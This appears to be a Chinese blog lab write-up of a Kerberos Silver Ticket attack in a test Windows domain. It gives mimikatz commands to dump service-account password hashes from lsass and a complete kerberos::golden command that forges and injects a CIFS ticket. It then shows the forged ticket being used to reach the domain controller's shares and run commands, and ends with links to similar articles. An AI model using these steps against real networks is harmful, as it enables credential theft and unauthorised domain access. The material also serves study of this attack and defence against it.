伪造白银票据实验

最新推荐文章于 2024-08-29 10:55:48 发布
最新推荐文章于 2024-08-29 10:55:48 发布
阅读量617 收藏
点赞数
分类专栏: 实验
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/GG_iii/article/details/108569686
版权

0x01 实验准备

实验工具:

  • PsExec64工具是内网渗透中的免杀渗透利器。

  • mimikatz_trunk 工具的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码,还可以提升进程权限、注入进程、读取进程内存等等。

实验环境:
  • Windows server 2008 作为域控制器,域为 yuming.com
  • Windows 7 作为 yuming域下的一台设备

0x02 白银票据条件

  1. 域名称
  2. 域的SID值
  3. 域的服务账号的密码HASH
  4. 伪造的用户名,可以是任意用户名,一般是伪造administrator
  5. 需要访问的服务

0x03 实验步骤

一、获取service账户的hash值
在域控制器上操作:

通过 mimikatz 输入命令来获取Network Server下服务账户哈希值:sekurlsa::logonPasswords
也可以通过wce、gethashes等方式获取。
在这里插入图片描述
在这里插入图片描述

若出现错误,执行此命令后再获取 HASH值:privilege::debug
在这里插入图片描述

二、伪造票据
在 yuming域下的设备(Windows 7)上操作:

得到服务账号的 HASH 之后使用mimikatz中的 kerberos::golden功能生成白银票据TGS ticket。

参数说明:

/domain:当前域名称
/sid:SID 值,域的SID
/target:目标主机
/rc4:目标主机的 HASH值
/server:需要获取权限的服务
/user:伪造的用户名
/ptt:表示的是Pass The Ticket 攻击,是把生成的票据导入内存,也可以使用 /ticket 导出之后再使用 kerberos::ptt 导入。

常见的service:

在这里插入图片描述

这里的service使用的是 cifs 服务:
kerberos::golden /domain:test.com /sid:S-1-5-21-593020204-2933201490-533286667 /target:计算机名称.test.com /rc4:68d728ba8b578294832fb6247c912f94 /service:cifs /user:administrator /ptt

在这里插入图片描述

3. 获取权限
在 yuming域下的设备(Windows 7)上操作:

清空本地票据缓存,导入伪造的票据(如果用的/ptt参数就跳过这一步,只需要清理本地缓存)
查看本地保存的票据:kerberos::list
清理本地票据缓存:kerberos::purge
导入伪造的白银票据:kerberos::ptt silver.kiribi (步骤2使用了 /ptt ,所以此步忽略)
查看tgt票据(只能看到存在的黄金票据):kerberos::tgt
票据20分钟内有效,过期之后可以再次导入
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4. 利用伪造的白银票据
在 yuming域下的设备(Windows 7)上操作:

  1. 访问域控的共享目录
    在这里插入图片描述

  2. 远程登录,执行命令
    在这里插入图片描述

GoKing1
关注
专栏目录
白银票据原理制作与利用
G3et的博客
01-19 316
1、如果是域普通用户,主要看防火墙,开了防火墙可能会导致dir过不去2、白银票据伪造的是ST,只能访问特定的服务,如cifs(文件共享服务)、winrm(远程管理)3、白银票据获取的是服务的hash4、白银票据不通过kdc,相对黄金票据银票更加隐蔽。
域渗透 | 白银票据利用
无心的博客
10-30 2984
目录 0x01 介绍 0x02 白银票据利用 0x01 介绍 之前,我们已经详细说过Kerberos认证的流程,这次我们就来说说如何对其进行利用,这次主要说的是白银票据伪造(Silver Tickets) 白银票据伪造利用的是Kerberos认证中的第三个步骤,在第三步的时候,client会带着ticket向server的某个服务进行请求,如果验证通过就可以访问server上的指定服务了,这里...
内网渗透--CS伪造黄金票据白银票据
Armandhe的博客
06-24 3674
性感作者,在线翻车
域渗透之(白银票据利用)
cj_Hydra's Blog
02-14 3019
前言: 上一篇文件里面,已经很详细的和大家介绍了kerberos协议认证的方式了,上次主要说的是黄金票据(伪造TGT),今天主要来和大家分析下白银票据(伪造TGS票据),稍后为大家介绍他们之间的区别。 实验步骤: 主域控:windows server 2008 IP地址:192.168.107.146 域内机器(Client):windows server 2008 IP地址:192.168.10...
黄金/白银票据制作
最新发布
weixin_67925097的博客
08-29 1022
免责声明:该文章仅提供学习交流,若用于违法行为与本人无关。
黄金白银票据伪造
gental_z的博客
01-04 2565
黄金白银票据伪造 域内协议Kerberos ​ 在域环境中,一般使用Kerberos来作为身份认证的一种协议。其实NTLM协议也存在于域环境中。两种协议共存,针对不同的协议,也就有了不同的攻击方式。 传统的Kerberos认证模型 ​ 首先来介绍一下Kerberos认证的模型: ​ 在Kerberos认证环境下,主要存在三种角色,分别为客户端、服务端以及KDC即密钥分发中心。在域环境中,KDC存在于DC上面。客户端想要访问服务端上的某些服务,首先需要向KDC申请一张TGT票据,然后使用此票据去申请访问目标
【域权限维持】-白银票据
qq_41617902的博客
11-08 423
域权限维持-白银票据的攻击过程与简单检测方式
AD域渗透 黄金与白银票据攻击
m0_57221101的博客
04-12 818
过两天研究明白kerberos协议里每次发包中各个参数的含义之后,会发一个协议的详细解析,也许能帮助大家比较详细的理解这套协议。敬请期待 以下演示环境借用红日团队vulnstack2域环境,感谢 工具 gentilkiwi/mimikatz: A little tool to play with Windows security (github.com) 也可以使用kali中帮你预编译好的,直接输入mimikatz就会告诉你在哪 黄金票据 原理 黄金票据攻击发生在我们知道域中的tgt验证用户k
Kerberos协议分析及域服务器配置以及黄金白银票据攻击复现
nopants的博客
06-16 1064
域服务器搭建以及用户加入域服务器及黄金白银票据攻击的验证复现
3.5 Silver Ticket白银票据制作原理及利用方式
GloryGod的博客
08-24 264
服务账号就是计算机名字+$用来管理服务的账号。
黄金白银票据伪造以及ms14-068的使用(域渗透)
weixin_45612728的博客
02-06 3590
以下实验使用到的软件有mimikatz和psexec软件.使用的到的pc有一台win7的计算机和一台域控的08服务器.注意:win7的计算机以普通的域用户添加到cyh.com域环境中.08服务器的ip地址为:192.168.0.222,dns:192.168.0.222,网关:192.168.0.2 1. 黄金票据伪造 黄金票据其实就是伪造tgt的,关于什么是tgt请看我之前的博客,tgt也有人称是通票. 实验步骤: 1.1前提 需要域的sid和tgt的hahs值 1.2 获取域控的的hash值,需要在域
PTT之白银票据
m0_58606546的博客
11-20 710
白银票据原理 如果说黄金票据伪造的TGT,那么白银票据就是伪造的ST。在Kerberos认证的第三大步,Client带着ST和Authenticator3向域上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问server上的指定服务了。所以我们只需要知道Server用户的Hash就可以伪...
票据传递攻击
qq_56426046的博客
11-12 1008
在 Kerberos 认证中,Client 通过 AS(身份认证服务)认证后,AS 会给Client 一个Logon Session Key 和 TGT,而 Logon Session Key 并不会保存在KDC 中,krbtgt 的NTLM Hash 又是固定的,所以只要得到 krbtgt 的 NTLM Hash,就可以伪造TGT和Logon Session Key 来进入下一步 Client 与 TGS 的交互。白银票据的利用过程是伪造TGS,通过已知的授权服务密码生成一张可以访问该服务的TGT。
哈希传递攻击/黄金白银票据
Y5neKO's blog
09-17 1924
Q&A Q1:pth在什么情况下能成功、哈希传递受到什么限制、什么情况下不能传递? A1:①pth在获取到目标机器中RID为500的内置管理员账户或在目标机器本地管理员组的域成员账户的hash值的情况下能成功;②哈希传递会受到目标系统上的UAC的限制,如果不是RID=500的内置账户则不会以完全管理员权限登录系统;③若目标系统完全禁止了所有用户的远程登录权限(包括RID为500的内置管理员),则无法进行传递。 Q2:安装补丁KB2871997后影响 A2:见文章中KB2871997补丁 -->
黄金票据白银票据详解
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-22 5620
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
一文搞懂黄金白银票据
m0_75218183的博客
06-29 1029
在学习黄金白银票据之前,我们先要搞懂Kerberos(三头保卫神犬)协议。Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下, Kerberos 作为一种可信任的第三方认证服务,是通过传统的密码技术(如:共享密钥)执行认证服务的。
白银票据及黄金票据的一些学习
dayouzi的博客
08-11 660
Golden Ticket(金票)是通过伪造TGT(TickerGranting Ticket),因为只要有了高权限的TGT,那么就可以发送给TGS换取任意服务的ST。可以说有了金票就有了域内的最高权限。对于攻击者来说,只要拿到了域控权限,就可以直接导出krbtgt的Hash值,再通过mimikatz即可生成任意用户任何权限的Ticket,也就是Golden Ticket。
内网渗透——黄金票据白银票据
来日可期的博客
10-11 3280
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中域控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造票据。这种伪造票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有域内的最高权限,攻击者可以访问和控制所有域内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造票据。这种伪造票据允许攻击者模拟该服务账户的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值